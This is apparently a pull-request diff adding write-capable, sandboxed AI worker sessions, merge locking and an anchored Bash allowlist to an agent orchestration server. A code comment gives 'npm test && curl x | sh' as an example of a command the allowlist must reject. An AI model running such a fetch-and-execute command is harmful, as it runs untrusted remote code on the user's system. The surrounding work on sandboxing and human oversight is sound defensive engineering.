### PR TITLE
feat(server): orchestration implement (write) worker lifecycle — codex-only v1 (E-3 part 2)

### DIFF
--- a/packages/server/src/orchestration/orchestration-manager.js
+++ b/packages/server/src/orchestration/orchestration-manager.js
@@ -151,6 +151,7 @@ export class OrchestrationManager extends EventEmitter {
       subtasks: new Map(), // subtaskId -> { iterations, poa, result, state, role, branch, baseSha, worktreePath }
       results: [], // accepted { title, summary }
       integration: null, // { worktreePath, branch, merged: [] } — lazily created on first accepted implement subtask
+      mergeChain: Promise.resolve(), // per-run mutex serializing integration-worktree ops (create/merge/abort)
       phase: 'created',
       cancelled: false,
     })
@@ -472,14 +473,33 @@ export class OrchestrationManager extends EventEmitter {
   }
 
   // Accept an approved implement subtask: destroy the worker (auto-commits its
-  // worktree) then sequentially merge its branch into the run's integration
-  // worktree. Clean → done. Conflict → abort + escalate (the automated single
-  // fixup worker is deferred to E-3 part 3; the user resolves via the gate).
+  // OWN worktree — safe to run concurrently), then merge its branch into the
+  // run's integration worktree UNDER A PER-RUN LOCK so parallel accepts never
+  // overlap (create/merge/abort share one integration checkout — concurrent git
+  // merges would collide on index.lock and spuriously "fail"). Clean → done;
+  // conflict → abort + escalate (the automated fixup worker is E-3 part 3).
   async _acceptImplement(run, subtaskId, sessionId, result) {
     const st = run.subtasks.get(subtaskId)
     this._ledger.updateSubtask(run.runId, subtaskId, { status: 'merging' })
     await this._destroySession(run, sessionId)
     if (!st.branch || !st.baseSha) return this._escalateSubtask(run, subtaskId, 'no branch/worktree to merge')
+    return this._withMergeLock(run, () => this._mergeAccepted(run, subtaskId, result))
+  }
+
+  // Serialize the integration-worktree critical section per run: chain each
+  // caller behind the previous one so at most one create/merge/abort runs at a
+  // time. This is what makes "sequential merge" real.
+  async _withMergeLock(run, fn) {
+    const prev = run.mergeChain
+    let release
+    run.mergeChain = new Promise((r) => { release = r })
+    await prev.catch(() => {})
+    try { return await fn() } finally { release() }
+  }
+
+  async _mergeAccepted(run, subtaskId, result) {
+    if (run.cancelled || !this._runs.has(run.runId)) return null
+    const st = run.subtasks.get(subtaskId)
     const integration = await this._ensureIntegration(run, st.baseSha)
     if (!integration) return this._escalateSubtask(run, subtaskId, 'could not create the integration worktree')
     let merge
@@ -498,7 +518,8 @@ export class OrchestrationManager extends EventEmitter {
   }
 
   // Lazily create the run's integration worktree on the first accepted implement
-  // subtask (audit-only / repo-audit runs never create one).
+  // subtask (audit-only / repo-audit runs never create one). Only ever called
+  // from within _withMergeLock, so the check-then-act is not a TOCTOU race.
   async _ensureIntegration(run, baseSha) {
     if (run.integration) return run.integration
     const branchName = `chroxy/orch/${run.runId}/integration`
@@ -558,9 +579,14 @@ export class OrchestrationManager extends EventEmitter {
       metadata: { orchestrationRunId: run.runId, orchestrationRole: role === 'architect' ? 'architect' : `worker.${role}` },
     }
     if (role === 'implement') {
-      // Isolated write worktree + the OS write jail (codex-only in v1, #6735).
+      // Fail-closed: the write jail is codex-only in v1 (#6735). createRun already
+      // gates this, but hard-assert at the spawn choke point so any future path
+      // that produced a non-codex implement role aborts loudly rather than
+      // spawning an UNSANDBOXED write worker (acceptEdits does not confine paths).
+      if (spec.provider !== 'codex') throw new Error(`implement worker requires a codex provider (write jail is codex-only in v1); got '${spec.provider}'`)
+      // Isolated write worktree + the OS write jail.
       opts.worktree = true
-      if (spec.provider === 'codex') opts.codexSandbox = 'workspace-write'
+      opts.codexSandbox = 'workspace-write'
     } else if (spec.provider === 'codex') {
       opts.codexSandbox = 'read-only' // architect + audit are read-only (#6690)
     }

--- a/packages/server/src/orchestration/orchestration-manager.js
+++ b/packages/server/src/orchestration/orchestration-manager.js
@@ -1,9 +1,19 @@
 /**
- * OrchestrationManager (engine, epic #6691, step E-2) — the committee engine.
- * Owns run lifecycle for the READ/audit path: an architect session plans the
- * epic, worker sessions execute audit subtasks, the architect reviews each
- * plan-of-attack and result, and a synthesis turn produces the report. Write-
- * capable workers + merge-back are E-3; the wire projection is E-4.
+ * OrchestrationManager (engine, epic #6691, steps E-2 + E-3) — the committee
+ * engine. Owns run lifecycle: an architect session plans the epic, worker
+ * sessions execute subtasks, the architect reviews each plan-of-attack and
+ * result, and a synthesis turn produces the report.
+ *
+ * Two worker kinds:
+ *  - audit (read-only): read/search the repo, report findings. sdk/byok/codex.
+ *  - implement (write-capable, E-3): edit files in an ISOLATED worktree, then
+ *    the orchestrator commits + merges the branch into a run-owned integration
+ *    worktree. codex-ONLY in v1 (codexSandbox:'workspace-write' is the only
+ *    verified path jail; sdk/byok write pending #6735). The engine NEVER touches
+ *    the user's branch/working tree and NEVER pushes — output is branches.
+ *
+ * The wire projection is E-4; restart-reconcile / orphan-sweep / gate-timeouts /
+ * pause-resume + the automated conflict-fixup worker are E-3 part 3.
  *
  * Wires the merged foundations: RunLedger (M-2) for durable state + usage,
  * run-budget (M-3) for soft caps, TurnDriver (E-1) to drive sessions,
@@ -21,10 +31,11 @@ import { randomBytes } from 'node:crypto'
 import { extractDecision, DecisionParseError, buildRepairPrompt } from './decision-contract.js'
 import { makeGate, resolveGate as resolveGateModel, nextGateId } from './run-model.js'
 import {
-  architectPreamble, auditWorkerPreamble, presetFor,
+  architectPreamble, auditWorkerPreamble, implementWorkerPreamble, presetFor,
   buildPlanPrompt, buildPoaPrompt, buildPoaReviewPrompt,
   buildExecutePrompt, buildResultReviewPrompt, buildSynthesisPrompt,
 } from './role-prompts.js'
+import { createGitOps } from './git-ops.js'
 
 const DEFAULTS = {
   maxParallelWorkers: 2,
@@ -32,11 +43,20 @@ const DEFAULTS = {
   maxCommitteeIterations: 4,
   maxParseRetries: 2,
   turnTimeoutMs: 30 * 60 * 1000,
+  diff: { maxBytes: 65536, maxFileBytes: 8192 },
+  bash: { implementAllowlist: [] },
 }
 
 // Providers whose sessions can be metered AND permission-gated read-only (S-2
 // design matrix). audit workers must be one of these.
 const AUDIT_ELIGIBLE_PROVIDERS = new Set(['claude-sdk', 'claude-byok', 'codex'])
+
+// v1: write/implement workers are codex-ONLY. codexSandbox:'workspace-write' is a
+// verified OS jail confining edits to the worktree; acceptEdits/allow rules are
+// path-AGNOSTIC and do NOT confine paths, so sdk/byok can't be safely write-
+// capable until their sandbox is verified (tracked in #6735). A run whose worker
+// provider isn't implement-eligible has its implement subtasks coerced to audit.
+const IMPLEMENT_ELIGIBLE_PROVIDERS = new Set(['codex'])
 
 // Engine-side subtask states that end scheduling. 'escalated' is deliberately
 // excluded — it awaits a user gate, so it must block synthesis.
@@ -51,7 +71,7 @@ export class OrchestrationManager extends EventEmitter {
    *   now?: () => number, log?: object,
    * }} opts
    */
-  constructor({ sessionManager, ledger, turnDriver, permissionGateFactory = null, config = {}, roles = null, validateCwd = null, now = () => Date.now(), log = null }) {
+  constructor({ sessionManager, ledger, turnDriver, gitOps = null, permissionGateFactory = null, config = {}, roles = null, validateCwd = null, now = () => Date.now(), log = null }) {
     super()
     if (!sessionManager) throw new Error('OrchestrationManager requires a sessionManager')
     if (!ledger) throw new Error('OrchestrationManager requires a ledger')
@@ -59,8 +79,15 @@ export class OrchestrationManager extends EventEmitter {
     this._sm = sessionManager
     this._ledger = ledger
     this._driver = turnDriver
-    this._cfg = { ...DEFAULTS, ...(config.orchestration || config || {}) }
-    this._roles = roles || (config.orchestration && config.orchestration.roles) || null
+    const cfg = config.orchestration || config || {}
+    this._cfg = {
+      ...DEFAULTS,
+      ...cfg,
+      diff: { ...DEFAULTS.diff, ...(cfg.diff || {}) },
+      bash: { ...DEFAULTS.bash, ...(cfg.bash || {}) },
+    }
+    this._gitOps = gitOps || createGitOps()
+    this._roles = roles || cfg.roles || null
     this._validateCwd = validateCwd
     this._now = now
     this._log = log
@@ -76,6 +103,7 @@ export class OrchestrationManager extends EventEmitter {
         isOwnedSession: (sid) => this._isOwnedSession(sid),
         policyForSession: (sid) => this._roleClassForSession(sid),
         emitEscalation: (info) => this._onPermissionEscalation(info),
+        bashAllowlist: this._cfg.bash.implementAllowlist || [],
         log,
       })
     }
@@ -100,6 +128,7 @@ export class OrchestrationManager extends EventEmitter {
     if (!effectiveGoal) throw new Error('createRun requires a goal or a preset that provides one')
 
     const roleModels = this._resolveRoles(roleOverrides)
+    const implementEligible = IMPLEMENT_ELIGIBLE_PROVIDERS.has(roleModels.worker.provider)
     const configSnapshot = {
       cwd,
       roleModels,
@@ -115,11 +144,13 @@ export class OrchestrationManager extends EventEmitter {
       preset: presetDef,
       autoApprovePlan: autoApprovePlan === true,
       roleModels,
+      implementEligible, // codex-only in v1 (#6735) — else implement subtasks coerce to audit
       architectSessionId: null,
-      ownedSessions: new Map(), // sessionId -> { role: 'architect'|'audit', subtaskId }
+      ownedSessions: new Map(), // sessionId -> { role: 'architect'|'audit'|'implement'|'fixup', subtaskId }
       gates: new Map(), // gateId -> gate
-      subtasks: new Map(), // subtaskId -> { iterations, poa, result, state }
+      subtasks: new Map(), // subtaskId -> { iterations, poa, result, state, role, branch, baseSha, worktreePath }
       results: [], // accepted { title, summary }
+      integration: null, // { worktreePath, branch, merged: [] } — lazily created on first accepted implement subtask
       phase: 'created',
       cancelled: false,
     })
@@ -152,19 +183,20 @@ export class OrchestrationManager extends EventEmitter {
     } catch (err) {
       return this._failRun(run, `PLAN_${err instanceof DecisionParseError ? 'PARSE' : 'FAILED'}`, err)
     }
-    // Materialize subtasks. E-2 is the READ/audit path: every subtask runs
-    // read-only regardless of the role the architect proposed, so coerce all of
-    // them to 'audit' — labeling a subtask worker.implement while it actually
-    // runs through the read-only worker path would make the run record lie. The
-    // implement path (respecting spec.role for non-audit runs) is E-3.
+    // Materialize subtasks. A subtask runs 'implement' (write-capable) ONLY when
+    // the architect asked for it AND the run's worker provider is
+    // implement-eligible (codex, #6735) AND no preset forces audit. Otherwise it
+    // is coerced to read-only 'audit' — labeling it worker.implement while it
+    // actually runs read-only would make the run record lie.
     for (const spec of plan.subtasks) {
       const subtaskId = `st_${randomBytes(4).toString('hex')}`
-      if (spec.role && spec.role !== 'audit') {
-        this._log?.warn?.(`orchestration: subtask "${spec.title}" requested role '${spec.role}'; coerced to audit (read path only)`)
+      const wantsImplement = spec.role === 'implement'
+      const role = run.preset?.forceRole ?? (wantsImplement && run.implementEligible ? 'implement' : 'audit')
+      if (wantsImplement && role !== 'implement') {
+        this._log?.warn?.(`orchestration: subtask "${spec.title}" requested implement; coerced to audit (${run.preset?.forceRole ? 'preset forces audit' : 'worker provider not implement-eligible'})`)
       }
-      const role = 'audit'
       this._ledger.createSubtask(runId, { subtaskId, role: `worker.${role}`, title: spec.title })
-      run.subtasks.set(subtaskId, { iterations: 0, spec: { ...spec, role }, state: 'pending', poa: null, result: null })
+      run.subtasks.set(subtaskId, { iterations: 0, spec: { ...spec, role }, state: 'pending', poa: null, result: null, branch: null, baseSha: null, worktreePath: null })
     }
 
     if (run.autoApprovePlan) {
@@ -245,14 +277,14 @@ export class OrchestrationManager extends EventEmitter {
       st.state = 'active'
       this._runSubtask(run, subtaskId).catch((err) => {
         this._log?.warn?.(`subtask ${subtaskId} crashed: ${err?.message || err}`)
-        this._finishSubtask(run, subtaskId, 'failed')
+        this._finishSubtask(run, subtaskId, 'failed').catch(() => {})
       })
     }
   }
 
   async _runSubtask(run, subtaskId) {
     const st = run.subtasks.get(subtaskId)
-    let sessionId = this._spawnWorker(run, subtaskId)
+    let sessionId = await this._spawnWorker(run, subtaskId)
 
     let feedback = null
     // committee loop for this subtask
@@ -278,79 +310,110 @@ export class OrchestrationManager extends EventEmitter {
       if (poaReview.verdict === 'revise' || poaReview.verdict === 'redelegate') {
         st.iterations += 1
         feedback = poaReview.feedback ?? null
-        if (poaReview.verdict === 'redelegate') sessionId = this._respawnWorker(run, subtaskId, sessionId)
+        if (poaReview.verdict === 'redelegate') sessionId = await this._respawnWorker(run, subtaskId, sessionId)
         continue
       }
       // 3) execute
       this._ledger.updateSubtask(run.runId, subtaskId, { status: 'executing' })
       const result = await this._driveDecision(run, sessionId, buildExecutePrompt({ subtask: st.spec, feedback }), 'work_result', 'execute', subtaskId).then((r) => r.decision)
       st.result = result
-      // 4) architect reviews the result
+      // 3b) implement subtasks: commit the worktree and compute a review diff so
+      // the architect reviews the ACTUAL change, not just the worker's summary.
+      const diff = st.spec.role === 'implement' ? await this._commitAndDiff(run, subtaskId, sessionId) : null
+      // 4) architect reviews the result (+ diff for implement)
       this._ledger.updateSubtask(run.runId, subtaskId, { status: 'result_review' })
-      const resultReview = await this._architectReview(run, buildResultReviewPrompt({ subtask: st.spec, result }), 'result_review')
+      const resultReview = await this._architectReview(run, buildResultReviewPrompt({ subtask: st.spec, result, diff }), 'result_review')
       this._ledger.recordCommitteeReview(run.runId, subtaskId, { phase: 'result', verdict: resultReview.verdict, reviewerSessionId: run.architectSessionId, notes: resultReview.feedback ?? '' })
       if (resultReview.verdict === 'approve') {
+        if (st.spec.role === 'implement') return await this._acceptImplement(run, subtaskId, sessionId, result)
         run.results.push({ title: st.spec.title, summary: result.summary })
-        this._destroySession(run, sessionId)
+        await this._destroySession(run, sessionId)
         return this._finishSubtask(run, subtaskId, 'done')
       }
       if (resultReview.verdict === 'escalate') return this._escalateSubtask(run, subtaskId, resultReview.feedback || 'architect escalated the result')
       // revise / redelegate → loop with feedback (redelegate gets a fresh worker)
       st.iterations += 1
       feedback = resultReview.feedback ?? null
-      if (resultReview.verdict === 'redelegate') sessionId = this._respawnWorker(run, subtaskId, sessionId)
+      if (resultReview.verdict === 'redelegate') sessionId = await this._respawnWorker(run, subtaskId, sessionId)
     }
   }
 
   // Spawn + register + rule-gate + attach a worker session for a subtask.
-  _spawnWorker(run, subtaskId) {
-    const sessionId = this._spawnSession(run, { role: 'audit', subtaskId })
-    run.ownedSessions.set(sessionId, { role: 'audit', subtaskId })
+  async _spawnWorker(run, subtaskId) {
+    const st = run.subtasks.get(subtaskId)
+    const role = st.spec.role === 'implement' ? 'implement' : 'audit'
+    const sessionId = this._spawnSession(run, { role, subtaskId })
+    run.ownedSessions.set(sessionId, { role, subtaskId })
     this._ledger.updateSubtask(run.runId, subtaskId, { status: 'briefing' })
-    this._applyReadOnlyRules(sessionId)
+    if (role === 'implement') {
+      // The write worker got an isolated worktree (worktree:true) — put it on a
+      // named branch and record the branch-point so the review diff + merge are
+      // reproducible. Its writes are confined by the OS sandbox (codex
+      // workspace-write), NOT by permission rules, so we do NOT apply read-only
+      // rules (they would deny the edits acceptEdits is meant to allow).
+      const worktreePath = this._workerWorktreePath(sessionId)
+      st.worktreePath = worktreePath
+      if (worktreePath) {
+        const branchName = `chroxy/orch/${run.runId}/${subtaskId}`
+        try {
+          const branchExists = await this._gitOps.branchExists(worktreePath, branchName)
+          if (branchExists.exists) await this._gitOps.deleteBranch(worktreePath, branchName)
+          const { branch, baseSha } = await this._gitOps.createBranch(worktreePath, branchName)
+          st.branch = branch
+          st.baseSha = baseSha
+        } catch (err) {
+          this._log?.warn?.(`orchestration: createBranch failed for ${subtaskId}: ${err?.message || err}`)
+        }
+      }
+    } else {
+      this._applyReadOnlyRules(sessionId)
+    }
     this._ledger.attachSession(run.runId, subtaskId, { sessionId, provider: run.roleModels.worker.provider, model: run.roleModels.worker.model, meterable: true })
     return sessionId
   }
 
   // redelegate: tear down the current worker and hand the subtask to a fresh one.
-  _respawnWorker(run, subtaskId, oldSessionId) {
-    this._destroySession(run, oldSessionId)
+  async _respawnWorker(run, subtaskId, oldSessionId) {
+    await this._destroySession(run, oldSessionId)
     this._ledger.updateSubtask(run.runId, subtaskId, { status: 'respawning' })
     return this._spawnWorker(run, subtaskId)
   }
 
-  _finishSubtask(run, subtaskId, status) {
+  // Release every session a subtask still owns (worker + any fixup). Awaits the
+  // auto-commit-before-destroy of an implement worktree so no work is lost.
+  async _releaseSubtaskSessions(run, subtaskId) {
+    for (const [sid, meta] of [...run.ownedSessions]) {
+      if (meta.subtaskId === subtaskId && meta.role !== 'architect') await this._destroySession(run, sid)
+    }
+  }
+
+  async _finishSubtask(run, subtaskId, status) {
     if (run.cancelled || !this._runs.has(run.runId)) return
     const st = run.subtasks.get(subtaskId)
     if (st) st.state = status
     this._ledger.updateSubtask(run.runId, subtaskId, { status })
-    // release the worker if still owned
-    for (const [sid, meta] of run.ownedSessions) {
-      if (meta.subtaskId === subtaskId && meta.role === 'audit') this._destroySession(run, sid)
-    }
+    await this._releaseSubtaskSessions(run, subtaskId)
     this._schedule(run)
   }
 
-  _escalateSubtask(run, subtaskId, reason) {
+  async _escalateSubtask(run, subtaskId, reason) {
     const st = run.subtasks.get(subtaskId)
     if (st) st.state = 'escalated'
     this._ledger.updateSubtask(run.runId, subtaskId, { status: 'escalated' })
     // Free this subtask's worker so a pending sibling can take the slot while
-    // the user resolves the escalation gate.
-    for (const [sid, meta] of [...run.ownedSessions]) {
-      if (meta.subtaskId === subtaskId && meta.role === 'audit') this._destroySession(run, sid)
-    }
+    // the user resolves the escalation gate (auto-commits implement work first).
+    await this._releaseSubtaskSessions(run, subtaskId)
     const gate = this._openGate(run, { kind: 'escalation', nodeId: subtaskId, summary: `Subtask "${st?.spec?.title ?? subtaskId}" escalated`, detail: reason })
     this.emit('gate_opened', { runId: run.runId, gate })
     this._schedule(run)
     return { runId: run.runId, subtaskId, escalated: true, gateId: gate.gateId }
   }
 
-  _resolveEscalation(run, gate, decision, note) {
+  async _resolveEscalation(run, gate, decision, note) {
     const subtaskId = gate.nodeId
     const st = subtaskId ? run.subtasks.get(subtaskId) : null
     if (!st) return { runId: run.runId, resolved: true }
-    if (decision === 'skip') { this._finishSubtask(run, subtaskId, 'skipped'); return { runId: run.runId, subtaskId, skipped: true } }
+    if (decision === 'skip') { await this._finishSubtask(run, subtaskId, 'skipped'); return { runId: run.runId, subtaskId, skipped: true } }
     if (decision === 'reject') return this._failRun(run, 'ESCALATION_REJECTED', new Error(note || 'user failed the run'))
     // approve / revise → re-drive the subtask (iteration reset via a fresh worker)
     st.state = 'pending'
@@ -365,12 +428,15 @@ export class OrchestrationManager extends EventEmitter {
     const { decision } = await this._driveDecision(run, run.architectSessionId, buildSynthesisPrompt({ goal: run.goal, results: run.results }), 'synthesis', 'synthesis', null)
     // The report lives in memory until M-4 (run-report.js) persists report.{json,md}.
     this._rememberReport(run.runId, decision.reportMarkdown)
-    this._destroySession(run, run.architectSessionId)
+    await this._destroySession(run, run.architectSessionId)
+    // Remove the integration worktree; its branch (the run's output) is kept.
+    const integrationBranch = run.integration?.branch ?? null
+    await this._cleanupIntegration(run)
     run.phase = 'completed'
     this._ledger.setStatus(run.runId, 'completed')
-    this.emit('run_completed', { runId: run.runId, reportMarkdown: decision.reportMarkdown })
+    this.emit('run_completed', { runId: run.runId, reportMarkdown: decision.reportMarkdown, integrationBranch })
     this._runs.delete(run.runId)
-    return { runId: run.runId, phase: 'completed', reportMarkdown: decision.reportMarkdown }
+    return { runId: run.runId, phase: 'completed', reportMarkdown: decision.reportMarkdown, integrationBranch }
   }
 
   // --- turn driving + decisions -------------------------------------------
@@ -383,6 +449,67 @@ export class OrchestrationManager extends EventEmitter {
     // review's LINK to the subtask is recorded separately via recordCommitteeReview.
     const { decision } = await this._driveDecision(run, run.architectSessionId, prompt, kind, kind, null)
     return decision
+  }
+
+  // --- implement (write) path ---------------------------------------------
+
+  // Auto-commit an implement worker's worktree and compute a capped review diff
+  // so the architect reviews the actual change.
+  async _commitAndDiff(run, subtaskId, sessionId) {
+    const st = run.subtasks.get(subtaskId)
+    const worktreePath = st.worktreePath || this._workerWorktreePath(sessionId)
+    if (!worktreePath || !st.baseSha) return null
+    try {
+      await this._gitOps.autoCommit({ worktreePath, subtaskId })
+      return await this._gitOps.computeCappedDiff({
+        repoDir: worktreePath, baseSha: st.baseSha, headRef: 'HEAD',
+        maxBytes: this._cfg.diff.maxBytes, maxFileBytes: this._cfg.diff.maxFileBytes,
+      })
+    } catch (err) {
+      this._log?.warn?.(`orchestration: commit/diff failed for ${subtaskId}: ${err?.message || err}`)
+      return null
+    }
+  }
+
+  // Accept an approved implement subtask: destroy the worker (auto-commits its
+  // worktree) then sequentially merge its branch into the run's integration
+  // worktree. Clean → done. Conflict → abort + escalate (the automated single
+  // fixup worker is deferred to E-3 part 3; the user resolves via the gate).
+  async _acceptImplement(run, subtaskId, sessionId, result) {
+    const st = run.subtasks.get(subtaskId)
+    this._ledger.updateSubtask(run.runId, subtaskId, { status: 'merging' })
+    await this._destroySession(run, sessionId)
+    if (!st.branch || !st.baseSha) return this._escalateSubtask(run, subtaskId, 'no branch/worktree to merge')
+    const integration = await this._ensureIntegration(run, st.baseSha)
+    if (!integration) return this._escalateSubtask(run, subtaskId, 'could not create the integration worktree')
+    let merge
+    try {
+      merge = await this._gitOps.mergeNoFf({ integrationWorktree: integration.worktreePath, branch: st.branch, subtaskId })
+    } catch (err) {
+      return this._escalateSubtask(run, subtaskId, `merge failed: ${err?.message || err}`)
+    }
+    if (merge.ok) {
+      integration.merged.push(subtaskId)
+      run.results.push({ title: st.spec.title, summary: result.summary, branch: st.branch })
+      return this._finishSubtask(run, subtaskId, 'done')
+    }
+    try { await this._gitOps.abortMerge(integration.worktreePath) } catch { /* best-effort */ }
+    return this._escalateSubtask(run, subtaskId, `merge conflict in: ${(merge.conflictFiles || []).join(', ') || '(see git status)'}`)
+  }
+
+  // Lazily create the run's integration worktree on the first accepted implement
+  // subtask (audit-only / repo-audit runs never create one).
+  async _ensureIntegration(run, baseSha) {
+    if (run.integration) return run.integration
+    const branchName = `chroxy/orch/${run.runId}/integration`
+    try {
+      const { worktreePath, branch } = await this._gitOps.createIntegrationWorktree({ repoDir: run.cwd, runId: run.runId, branchName, baseSha })
+      run.integration = { worktreePath, branch, merged: [] }
+      return run.integration
+    } catch (err) {
+      this._log?.warn?.(`orchestration: createIntegrationWorktree failed: ${err?.message || err}`)
+      return null
+    }
   }
 
   // Drive one turn and extract its decision, with a repair-reprompt ladder.
@@ -416,19 +543,35 @@ export class OrchestrationManager extends EventEmitter {
 
   _spawnSession(run, { role, subtaskId = null }) {
     const spec = role === 'architect' ? run.roleModels.architect : run.roleModels.worker
+    const preamble = role === 'architect' ? architectPreamble()
+      : role === 'implement' ? implementWorkerPreamble()
+      : auditWorkerPreamble()
     const opts = {
       name: `orch:${run.runId}:${role}${subtaskId ? `:${subtaskId}` : ''}`,
       cwd: run.cwd,
       provider: spec.provider,
       model: spec.model,
-      permissionMode: 'approve',
-      sessionPreamble: role === 'architect' ? architectPreamble() : auditWorkerPreamble(),
+      // implement workers accept their own edits (path confinement comes from the
+      // OS sandbox, NOT permission rules); everyone else prompts (gate answers).
+      permissionMode: role === 'implement' ? 'acceptEdits' : 'approve',
+      sessionPreamble: preamble,
       metadata: { orchestrationRunId: run.runId, orchestrationRole: role === 'architect' ? 'architect' : `worker.${role}` },
     }
-    // codex audit workers get the read-only sandbox (#6690).
-    if (spec.provider === 'codex') opts.codexSandbox = 'read-only'
+    if (role === 'implement') {
+      // Isolated write worktree + the OS write jail (codex-only in v1, #6735).
+      opts.worktree = true
+      if (spec.provider === 'codex') opts.codexSandbox = 'workspace-write'
+    } else if (spec.provider === 'codex') {
+      opts.codexSandbox = 'read-only' // architect + audit are read-only (#6690)
+    }
     const sessionId = this._sm.createSession(opts)
     return sessionId
+  }
+
+  // The isolated worktree dir SessionManager created for a worktree:true session.
+  _workerWorktreePath(sessionId) {
+    const entry = this._sm.getSession?.(sessionId)
+    return entry?.worktreePath || entry?.session?.worktreePath || null
   }
 
   _applyReadOnlyRules(sessionId) {
@@ -441,8 +584,21 @@ export class OrchestrationManager extends EventEmitter {
     }
   }
 
-  _destroySession(run, sessionId) {
+  // The single teardown choke point. For an implement worker, auto-commit its
+  // worktree FIRST — destroySession removes the worktree, which would delete
+  // uncommitted work. This covers every release path (accept, finish, escalate,
+  // redelegate, fail, cancel) at one site.
+  async _destroySession(run, sessionId) {
     if (!sessionId) return
+    const meta = run.ownedSessions.get(sessionId)
+    if (meta?.role === 'implement' && meta.subtaskId) {
+      const st = run.subtasks.get(meta.subtaskId)
+      const worktreePath = st?.worktreePath || this._workerWorktreePath(sessionId)
+      if (worktreePath) {
+        try { await this._gitOps.autoCommit({ worktreePath, subtaskId: meta.subtaskId }) }
+        catch (err) { this._log?.warn?.(`orchestration: auto-commit before destroy failed for ${sessionId}: ${err?.message || err}`) }
+      }
+    }
     run.ownedSessions.delete(sessionId)
     try { this._sm.destroySession?.(sessionId) } catch { /* best-effort */ }
   }
@@ -467,32 +623,47 @@ export class OrchestrationManager extends EventEmitter {
     this.emit('permission_escalation', { runId: run.runId, ...info })
   }
 
-  _failRun(run, code, err) {
+  async _failRun(run, code, err) {
     // A cancel that already tore the run down wins: don't overwrite the
     // terminal 'cancelled' status with 'failed' (or double-emit lifecycle
     // events) when an in-flight turn rejects SESSION_GONE on the next tick.
     if (run.cancelled || !this._runs.has(run.runId)) return { runId: run.runId, phase: run.phase }
     run.phase = 'failed'
     this._ledger.setStatus(run.runId, 'failed', code)
-    // tear down any owned sessions
-    for (const sid of [...run.ownedSessions.keys()]) this._destroySession(run, sid)
+    // tear down any owned sessions (auto-commits implement worktrees first)
+    for (const sid of [...run.ownedSessions.keys()]) await this._destroySession(run, sid)
+    await this._cleanupIntegration(run)
     this.emit('run_failed', { runId: run.runId, code, message: err?.message || String(err) })
     this._runs.delete(run.runId)
     return { runId: run.runId, phase: 'failed', code }
   }
 
-  cancelRun(runId, { reason = 'user' } = {}) {
+  async cancelRun(runId, { reason = 'user' } = {}) {
     const run = this._runs.get(runId)
     if (!run) return null
     run.cancelled = true
+    // interrupt every in-flight owned session, then release (auto-commit → destroy)
+    // so no implement worker's uncommitted work is lost.
     for (const sid of [...run.ownedSessions.keys()]) {
       try { this._sm.getSession?.(sid)?.session?.interrupt?.() } catch { /* ignore */ }
-      this._destroySession(run, sid)
     }
+    for (const sid of [...run.ownedSessions.keys()]) await this._destroySession(run, sid)
+    await this._cleanupIntegration(run)
     this._ledger.setStatus(runId, 'cancelled', reason)
     this.emit('run_cancelled', { runId, reason })
     this._runs.delete(runId)
     return { runId, phase: 'cancelled' }
+  }
+
+  // Remove the run's integration WORKTREE (orchestrator-owned, under the
+  // worktrees root). The integration BRANCH is KEPT — it is the run's output.
+  async _cleanupIntegration(run) {
+    if (!run.integration?.worktreePath) return
+    try {
+      await this._gitOps.removeWorktree({ repoDir: run.cwd, worktreePath: run.integration.worktreePath })
+      await this._gitOps.pruneWorktrees(run.cwd)
+    } catch (err) { this._log?.warn?.(`orchestration: integration cleanup failed: ${err?.message || err}`) }
+    run.integration = null
   }
 
   _get(runId) {
@@ -505,14 +676,15 @@ export class OrchestrationManager extends EventEmitter {
     return false
   }
   _roleClassForSession(sessionId) {
-    // The architect is read-only too (it plans/reviews, never edits), so it maps
-    // to the 'audit' policy: reads are rule-allowed and never reach the gate;
-    // anything else (Bash) is denied. Returning null here would make the gate
-    // IGNORE the architect, wedging any non-rule tool it emits until the turn
-    // watchdog fires and fails the run.
+    // The gate policy per owned session:
+    //  - implement/fixup → 'implement' (Bash matched against the allowlist; else escalate)
+    //  - architect/audit → 'audit' (read-only; reads are rule-allowed and never
+    //    reach the gate, anything else is denied). The architect maps to 'audit'
+    //    rather than null so the gate answers (denies) it instead of IGNORING it
+    //    and wedging a stray tool until the turn watchdog fires.
     for (const run of this._runs.values()) {
       const meta = run.ownedSessions.get(sessionId)
-      if (meta) return 'audit'
+      if (meta) return (meta.role === 'implement' || meta.role === 'fixup') ? 'implement' : 'audit'
     }
     return null
   }

--- a/packages/server/src/orchestration/permission-gate.js
+++ b/packages/server/src/orchestration/permission-gate.js
@@ -42,11 +42,13 @@ export class OrchestrationPermissionGate {
     this._policyForSession = policyForSession
     this._emitEscalation = emitEscalation
     this._log = log
-    // Compile the implement-worker Bash allowlist once (strings → anchored regex,
-    // regex passed through). A Bash command that matches is auto-approved; a
-    // non-match is escalated to the user. There is NEVER a standing whitelist —
-    // each request is still answered per-request via respondToPermission.
-    this._bashAllowlist = (bashAllowlist || []).map((p) => (p instanceof RegExp ? p : new RegExp(p)))
+    // Compile the implement-worker Bash allowlist once. String entries are
+    // ANCHORED (^(?:…)$) so an allowlisted phrase can't match as a substring of
+    // a larger command — `npm test` must NOT allow `npm test && curl x | sh`.
+    // Pre-built RegExp entries pass through as-authored. A match is auto-approved;
+    // a non-match escalates. There is NEVER a standing whitelist — each request
+    // is still answered per-request via respondToPermission.
+    this._bashAllowlist = (bashAllowlist || []).map((p) => (p instanceof RegExp ? p : new RegExp(`^(?:${p})$`)))
     this._onEvent = this._handleSessionEvent.bind(this)
     this._sm.on('session_event', this._onEvent)
   }

--- a/packages/server/src/orchestration/permission-gate.js
+++ b/packages/server/src/orchestration/permission-gate.js
@@ -31,7 +31,7 @@ export class OrchestrationPermissionGate {
    *   log?: object,
    * }} opts
    */
-  constructor({ sessionManager, isOwnedSession, policyForSession, emitEscalation = null, log = null }) {
+  constructor({ sessionManager, isOwnedSession, policyForSession, emitEscalation = null, bashAllowlist = [], log = null }) {
     if (!sessionManager || typeof sessionManager.on !== 'function') {
       throw new Error('OrchestrationPermissionGate requires a sessionManager EventEmitter')
     }
@@ -42,6 +42,11 @@ export class OrchestrationPermissionGate {
     this._policyForSession = policyForSession
     this._emitEscalation = emitEscalation
     this._log = log
+    // Compile the implement-worker Bash allowlist once (strings → anchored regex,
+    // regex passed through). A Bash command that matches is auto-approved; a
+    // non-match is escalated to the user. There is NEVER a standing whitelist —
+    // each request is still answered per-request via respondToPermission.
+    this._bashAllowlist = (bashAllowlist || []).map((p) => (p instanceof RegExp ? p : new RegExp(p)))
     this._onEvent = this._handleSessionEvent.bind(this)
     this._sm.on('session_event', this._onEvent)
   }
